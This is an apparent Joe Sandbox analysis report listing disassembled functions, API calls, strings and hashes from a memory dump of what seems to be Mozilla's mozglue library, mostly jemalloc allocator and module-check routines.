: (malloc) Unsupported character in malloc options: ', xrefs: 6CCD3A02
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6CCD37BD
MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6CCD3793
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6CCD37D2
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6CCD37A8
MOZ_CRASH(), xrefs: 6CCD3950
MOZ_RELEASE_ASSERT(mNode), xrefs: 6CCD3559, 6CCD382D, 6CCD3848
<jemalloc>, xrefs: 6CCD3941, 6CCD39F1
MALLOC_OPTIONS, xrefs: 6CCD35FE

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 3040639385-4173974723
Opcode ID: e9827765546471bca38b7b62aae379d1935ff37f2c8b585e0fd5d3052ca7d3cf
Instruction ID: cefd283aeeca80036ae9cd5990b2d701be02d7d6eaa6225e89d1c60de2ecdeee
Opcode Fuzzy Hash: e9827765546471bca38b7b62aae379d1935ff37f2c8b585e0fd5d3052ca7d3cf
Instruction Fuzzy Hash: BB537B71A057018FD304CF29C550616FBF1BF89328F2AC66DE9699BB91E771E842CB81

Function 6CCF34A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON

Download Yara Rule

APIs

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3527
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF355B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF35BC
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF35E0
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF363A
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3693
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF36CD
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3703
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF373C
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3775
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF378F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3892
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF38BB
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3902
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3939
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3970
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF39EF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3A26
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3AE5
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3E85
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3EBA
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3EE2

Part of subcall function 6CCF6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6CCF61DD
Part of subcall function 6CCF6180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6CCF622C

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF40F9
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF412F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF4157

Part of subcall function 6CCF6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CCF6250
Part of subcall function 6CCF6180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCF6292

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF441B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF4448
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CCF484E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CCF4863
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CCF4878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CCF4896
free.MOZGLUE ref: 6CCF489F

Strings

, xrefs: 6CCF4CD2

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: floor$free$malloc$memcpy
String ID:
API String ID: 3842999660-3916222277
Opcode ID: ff282f6a4410beb230028b7241d7c7bfd13a08724550b63c6cf6cb410eaa5aed
Instruction ID: 5769cc747e6491cc65f103701b323b21b5b8f780b38f2c06ee85d6cd54bdc2e8
Opcode Fuzzy Hash: ff282f6a4410beb230028b7241d7c7bfd13a08724550b63c6cf6cb410eaa5aed
Instruction Fuzzy Hash: 39F25B74908B808FC765CF28C18469AFBF5FFCA344F118A5ED99997711EB319886CB42

Function 6CCA64C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6CCA64DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6CCA64F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6CCA6505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6CCA6518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6CCA652B
memcpy.VCRUNTIME140(?,?,?), ref: 6CCA671C
GetCurrentProcess.KERNEL32 ref: 6CCA6724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CCA672F
GetCurrentProcess.KERNEL32 ref: 6CCA6759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CCA6764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6CCA6A80
GetSystemInfo.KERNEL32(?), ref: 6CCA6ABE
__Init_thread_footer.LIBCMT ref: 6CCA6AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCA6AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCA6AF7

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6CCA6798
detoured.dll, xrefs: 6CCA64DA
_etoured.dll, xrefs: 6CCA64ED
nvdxgiwrap.dll, xrefs: 6CCA6513
user32.dll, xrefs: 6CCA6526
nvd3d9wrap.dll, xrefs: 6CCA6500

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: d31eb77b460af0aeb8ff87edb7c3b135527ee2e900296262c8daa79f64e134da
Instruction ID: aa6d348f4cd06cb4d387e08088a6a0961b089de66d2a2d5144809fb8257812db
Opcode Fuzzy Hash: d31eb77b460af0aeb8ff87edb7c3b135527ee2e900296262c8daa79f64e134da
Instruction Fuzzy Hash: 9AF10670A0561A9FDB20CFA9CC4C7DAB7B4AF45318F144199D919E3B81E731AE86CF90

Function 6CCFC4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCFC5F9
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCFC6FB
memset.VCRUNTIME140(?,00000000,00004008), ref: 6CCFC74D
memset.VCRUNTIME140(?,00000000,00004008), ref: 6CCFC7DE
memset.VCRUNTIME140(?,00000000,00004014), ref: 6CCFC9D5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCFCC76
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CCFCD7A
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCFDB40
memcpy.VCRUNTIME140(?,?,?), ref: 6CCFDB62
memcpy.VCRUNTIME140(?,?,?), ref: 6CCFDB99
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCFDD8B
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CCFDE95
memcpy.VCRUNTIME140(?,?,?), ref: 6CCFE360
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCFE432
memcpy.VCRUNTIME140(?,?,?), ref: 6CCFE472

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction ID: 29716b6d164cef4efcf3d91189df7571d1b30b662e46fb1dc4d272cc694957a2
Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction Fuzzy Hash: DB339171E0021ACFCB14CF98C8806EDBBF2FF49314F294269D965AB755E731A946CB90

Function 6CCAFD00 Relevance: 31.4, APIs: 17, Strings: 3, Instructions: 1360memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CD1E7B8), ref: 6CCAFF81
LeaveCriticalSection.KERNEL32(6CD1E7B8), ref: 6CCB022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6CCB0240
EnterCriticalSection.KERNEL32(6CD1E768), ref: 6CCB025B
LeaveCriticalSection.KERNEL32(6CD1E768), ref: 6CCB027B

Strings

: (malloc) Error in VirtualFree(), xrefs: 6CCB0D67, 6CCB0D7B, 6CCB0DAC
MOZ_RELEASE_ASSERT(mNode), xrefs: 6CCAFE99, 6CCAFEB7, 6CCAFED3, 6CCB0DB8, 6CCB0DD3, 6CCB19B4
<jemalloc>, xrefs: 6CCB0D62, 6CCB0D76, 6CCB0DA7

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3577267516
Opcode ID: 497c74dbb5271a25fcd2d499a24efa6473f06a8b001e867a4b29101ede54dde4
Instruction ID: 0ad41b9c4b26e8a855b39ac3b6504ae6a311f154bba53df169e77c72f885beca
Opcode Fuzzy Hash: 497c74dbb5271a25fcd2d499a24efa6473f06a8b001e867a4b29101ede54dde4
Instruction Fuzzy Hash: D7C2D1B1A057418FD714CF69C580716BBE1BF89328F28C66DE4A99BBD5E731E801CB81

Function 6CCFE680 Relevance: 31.1, APIs: 22, Instructions: 3648COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00004014), ref: 6CCFE811
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCFEAA8
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CCFEBD5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCFEEF6
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCFF223
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6CCFF322
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CD00E03
memcpy.VCRUNTIME140(?,?,?,?), ref: 6CD00E54
memcpy.VCRUNTIME140(?,?,?), ref: 6CD00EAE
memcpy.VCRUNTIME140(?,?,?), ref: 6CD00ED4

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 69f05e0babb866ce21c80348513c7da21ea2efecee02c60470e10cf88611b86d
Instruction ID: 3f95737d07f30132525e32863639216df61311e2f547014a5b6a34f11f47043b
Opcode Fuzzy Hash: 69f05e0babb866ce21c80348513c7da21ea2efecee02c60470e10cf88611b86d
Instruction Fuzzy Hash: BC635B71E0025A8FCB14CFACC89069DFBF2FF89314F298269D855AB755D730A946CB90

Function 6CCD3E50 Relevance: 27.0, APIs: 13, Strings: 2, Instructions: 765COMMON

Download Yara Rule

APIs

Part of subcall function 6CCF7770: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6CCD3E7D,?,?,?,6CCD3E7D,?,?), ref: 6CCF777C

tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6CCD3F17
memset.VCRUNTIME140(?,00000000,00000110), ref: 6CCD3F5C
VerSetConditionMask.NTDLL ref: 6CCD3F8D
VerSetConditionMask.NTDLL ref: 6CCD3F99
VerSetConditionMask.NTDLL ref: 6CCD3FA0
VerSetConditionMask.NTDLL ref: 6CCD3FA7
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CCD3FB4

Strings

nvinit.dll, xrefs: 6CCD4479
nvd3d9wrap.dll, xrefs: 6CCD4466

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemsettolowerwcslen
String ID: nvd3d9wrap.dll$nvinit.dll
API String ID: 1189858803-2380496106
Opcode ID: 2cf6d2cc8f56a295d432a63bd3aca61a7d34be15183935780146caa912211791
Instruction ID: c1a97e332872c54730559109e6d983276ad2005b627455a07ff038c27a1c2c10
Opcode Fuzzy Hash: 2cf6d2cc8f56a295d432a63bd3aca61a7d34be15183935780146caa912211791
Instruction Fuzzy Hash: E1520571610B898FD711DF74C894AAB77E9AF45308F05092DE596CBB42EB34F90ACB60

Function 6CCBED10 Relevance: 25.4, APIs: 16, Instructions: 5407COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6CCBEE7A
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6CCBEFB5
memcpy.VCRUNTIME140(?,?,?,?), ref: 6CCC1695
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCC16B4
memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6CCC1770
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CCC1A3E

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: memset$freemallocmemcpy
String ID:
API String ID: 3693777188-0
Opcode ID: 2c79216e884793580e512a014c17339fbb585e2c810df928cdd6a4332d4346e0
Instruction ID: cc2e14c1d0b920f294d21e20c40651c4c85939b24c1ac78081f0cfb71e2e3296
Opcode Fuzzy Hash: 2c79216e884793580e512a014c17339fbb585e2c810df928cdd6a4332d4346e0
Instruction Fuzzy Hash: C7B31875E00219CFCB14CFA9C890A9DB7B2BF49304F2981A9D459BB745E730AD86CF91

Function 6CCAFEF0 Relevance: 23.8, APIs: 13, Strings: 2, Instructions: 1294memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CD1E7B8), ref: 6CCAFF81
LeaveCriticalSection.KERNEL32(6CD1E7B8), ref: 6CCB022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6CCB0240
EnterCriticalSection.KERNEL32(6CD1E768), ref: 6CCB025B
LeaveCriticalSection.KERNEL32(6CD1E768), ref: 6CCB027B

Strings

MOZ_CRASH(), xrefs: 6CCB0CA7
MOZ_RELEASE_ASSERT(mNode), xrefs: 6CCAFE99, 6CCAFEB7, 6CCAFED3, 6CCB0DB8, 6CCB0DD3, 6CCB19B4, 6CCB1A10

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3566792288
Opcode ID: 176697444084266b2584c2992590d3bbcafaacdef5fe471ccc9285671a6f6b94
Instruction ID: 52d679462c8a2b4ab846cb53c34a6169cb0e40b3e7a37de1df79ec9795d4e159
Opcode Fuzzy Hash: 176697444084266b2584c2992590d3bbcafaacdef5fe471ccc9285671a6f6b94
Instruction Fuzzy Hash: CDB2CEB1A057418FD714CF6DC590716BBE1BF89328F28C66CE86A9BB95E730E841CB41

Function 6CCE2E4E Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 579stringCOMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6CCE2ED3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CCE2EE7
MozFormatCodeAddressDetails.MOZGLUE(?,000000FF,00000000,?,?), ref: 6CCE2F0D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CCE3214
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CCE3242
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CCE36BF

Strings

get , xrefs: 6CCE3205
set , xrefs: 6CCE36EC
MOZ_PROFILER_SYMBOLICATE, xrefs: 6CCE378D

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: strlen$AddressCode$DescribeDetailsFormat
String ID: MOZ_PROFILER_SYMBOLICATE$get $set
API String ID: 2257098003-3318126862
Opcode ID: 444d647c0413699c4c0d317132a6d14a16355dddff43537b3e952c2fc6743b08
Instruction ID: b96038b46d05f4cb800ab4f320f15b4a0501d3bb6b7dc8d4f8c63f510d944ff7
Opcode Fuzzy Hash: 444d647c0413699c4c0d317132a6d14a16355dddff43537b3e952c2fc6743b08
Instruction Fuzzy Hash: 2A3250706083819FD324CF24C49069FB7E2AFCA318F588D5DE59987761EB31E94ACB52

Function 6CCBD4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CD1E784,?,?,?,?,?,?,?,00000000,76F92FE0,00000001,?,6CCCD1C5), ref: 6CCBD4F2
LeaveCriticalSection.KERNEL32(6CD1E784,?,?,?,?,?,?,?,00000000,76F92FE0,00000001,?,6CCCD1C5), ref: 6CCBD50B

Part of subcall function 6CC9CFE0: EnterCriticalSection.KERNEL32(6CD1E784), ref: 6CC9CFF6
Part of subcall function 6CC9CFE0: LeaveCriticalSection.KERNEL32(6CD1E784), ref: 6CC9D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76F92FE0,00000001,?,6CCCD1C5), ref: 6CCBD52E
EnterCriticalSection.KERNEL32(6CD1E7DC), ref: 6CCBD690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CCBD6A6
LeaveCriticalSection.KERNEL32(6CD1E7DC), ref: 6CCBD712
LeaveCriticalSection.KERNEL32(6CD1E784,?,?,?,?,?,?,?,00000000,76F92FE0,00000001,?,6CCCD1C5), ref: 6CCBD751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CCBD7EA

Strings

: (malloc) Error initializing arena, xrefs: 6CCBD82C
<jemalloc>, xrefs: 6CCBD827

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: fdb56529a4f7ee40f20841bb8ddd3ecef079689454a37a5780c76b5c015f6d05
Instruction ID: 8047e8378b467e4f2f4b89691e50fa2ced921e6f3bb7bac1aeb6e5df827448fb
Opcode Fuzzy Hash: fdb56529a4f7ee40f20841bb8ddd3ecef079689454a37a5780c76b5c015f6d05
Instruction Fuzzy Hash: 88910671A047018FE718CFA9C19476AB7E1FB89314F14492EE55AE7F89E730E845CB82

Function 6CCB5E90 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 2651COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(-0000000C), ref: 6CCB5EDB
memset.VCRUNTIME140(6CCF7765,000000E5,55CCCCCC), ref: 6CCB5F27
LeaveCriticalSection.KERNEL32(?), ref: 6CCB5FB2
memset.VCRUNTIME140(6CCF7765,000000E5,D1C09015), ref: 6CCB61F0
VirtualFree.KERNEL32(-00000001,00100000,00004000), ref: 6CCB7652

Strings

MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6CCB72F8
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6CCB72E3
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6CCB730D
MOZ_CRASH(), xrefs: 6CCB7BA4
MOZ_RELEASE_ASSERT(mNode), xrefs: 6CCB7BCD, 6CCB7C1F, 6CCB7C34, 6CCB80FD

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSectionmemset$EnterFreeLeaveVirtual
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 2613674957-1127040744
Opcode ID: 85f313b6e8360dac4528ca379f586097c0edb5b5274399d5490dc6dcff34f632
Instruction ID: e28f8189121a008ddf7504f0ae380af1686af3b3b89e4bc56f85ff5794333ef9
Opcode Fuzzy Hash: 85f313b6e8360dac4528ca379f586097c0edb5b5274399d5490dc6dcff34f632
Instruction Fuzzy Hash: FF33AE71A05B018FC308CF69C590615FBE2BF85328F29C6ADE8699F7A5E731E841CB51

Function 6CCF4EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 6CCF4EFF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF4F2E
moz_xmalloc.MOZGLUE ref: 6CCF4F52
memset.VCRUNTIME140(00000000,00000000), ref: 6CCF4F62
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF52B2
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF52E6
Sleep.KERNEL32(00000010), ref: 6CCF5481
